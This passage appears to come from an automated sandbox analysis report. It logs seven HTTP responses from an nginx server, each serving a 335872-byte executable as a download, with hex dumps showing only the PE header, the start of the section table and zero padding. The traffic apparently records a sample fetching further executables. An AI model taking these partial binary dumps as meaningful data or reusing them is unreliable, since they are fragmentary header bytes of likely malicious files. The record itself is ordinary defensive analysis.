00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:36 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:36 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:36 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:37 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:37 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:06:20 GMTConnection: keep-aliveETag: "628c055c-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:40 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:47:40 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
